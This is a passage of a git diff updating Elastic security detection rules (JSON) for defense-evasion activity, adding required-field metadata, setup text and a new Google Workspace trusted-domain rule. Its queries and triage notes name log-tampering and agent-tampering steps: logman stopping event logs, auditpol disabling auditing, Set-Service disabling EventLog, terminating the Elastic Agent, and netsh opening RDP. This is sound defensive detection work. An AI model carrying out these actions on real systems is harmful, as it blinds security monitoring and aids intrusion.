Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n\n ((process.name:\"logman.exe\" or process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\t\n ((process.name:\"auditpol.exe\" or process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n\n ((process.name:\"logman.exe\" or process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json index 0c4fb8d0cd9dd..198e150934592 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "DNS-over-HTTPS Enabled via Registry", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "registry where event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", "references": [ "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json new file mode 100644 index 0000000000000..bc0f2d527003f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json @@ -0,0 +1,91 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a domain is added to the list of trusted Google Workspace domains. An adversary may add a trusted domain in order to collect and exfiltrate data from their target\u2019s organization with less restrictive security controls.", + "false_positives": [ + "Trusted domains may be added by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Domain Added to Google Workspace Trusted Domains", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_TRUSTED_DOMAINS\n", + "references": [ + "https://support.google.com/a/answer/6160020?hl=en" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "cf549724-c577-4fd6-8f9b-d1b8ec519ec0", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 14 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json index 96d7c2a2ebbdc..5875ff001b74c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious .NET Code Compilation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json index d93764d893ef6..c90db2e5eaf03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json @@ -14,15 +14,45 @@ "interval": "10m", "language": "kuery", "license": "Elastic License v2", - "name": "AWS EC2 Flow Log Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "name": "AWS VPC Flow Logs Deletion", + "note": "## Triage and analysis\n\n### Investigating AWS VPC Flow Logs Deletion\n\nVPC Flow Logs is an AWS feature that enables you to capture information about the IP traffic going to and from network\ninterfaces in your virtual private cloud (VPC). Flow log data can be published to Amazon CloudWatch Logs or Amazon S3.\n\nThis rule identifies the deletion of VPC flow logs using the API `DeleteFlowLogs` action. Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n- Administrators may rotate these logs after a certain period as part of their retention policy or after importing them\nto a SIEM.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DeleteFlowLogs and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9395fd2c-9947-4472-86ef-4aceb2f7e872", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json index 0e019e84c8298..297d1fc0fcab2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Network Access Control List Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(DeleteNetworkAcl or DeleteNetworkAclEntry) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl.html", @@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl-entry.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteNetworkAclEntry.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8623535c-1e17-44e1-aa97-7a0699c3037d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -60,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json index e7dc47dcbd109..c6d5938abf6f7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json @@ -10,10 +10,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Elastic Agent Service Terminated", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and \n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\")) \nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\",\"service\") and \n process.args : (\"elastic-agent\", \"stop\")) \n or \n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and \n event.action : \"end\"))\n", + "note": "", + "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\"))\nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\", \"service\") and \n process.args : \"elastic-agent\" and\n process.args : \"stop\") \n or \n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and\n event.action : \"end\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json index 38f6d22bef189..0508fdbca2d48 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS ElastiCache Security Group Created", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:\"Create Cache Security Group\" and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:\"Create Cache Security Group\" and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/API_CreateCacheSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7b3da11a-60a2-412e-8aa7-011e1eb9ed47", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json index 0ba4be1170091..7c6f6dcd44010 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS ElastiCache Security Group Modified or Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:(\"Delete Cache Security Group\" or \n\"Authorize Cache Security Group Ingress\" or \"Revoke Cache Security Group Ingress\" or \"AuthorizeCacheSecurityGroupEgress\" or \n\"RevokeCacheSecurityGroupEgress\") and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:(\"Delete Cache Security Group\" or\n\"Authorize Cache Security Group Ingress\" or \"Revoke Cache Security Group Ingress\" or \"AuthorizeCacheSecurityGroupEgress\" or\n\"RevokeCacheSecurityGroupEgress\") and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/Welcome.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json index 455f652b29bb3..dae0a09044434 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Desktop Enabled in Windows Firewall by Netsh", - "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the\n`netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware\nof it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the\n`netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware\nof it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + 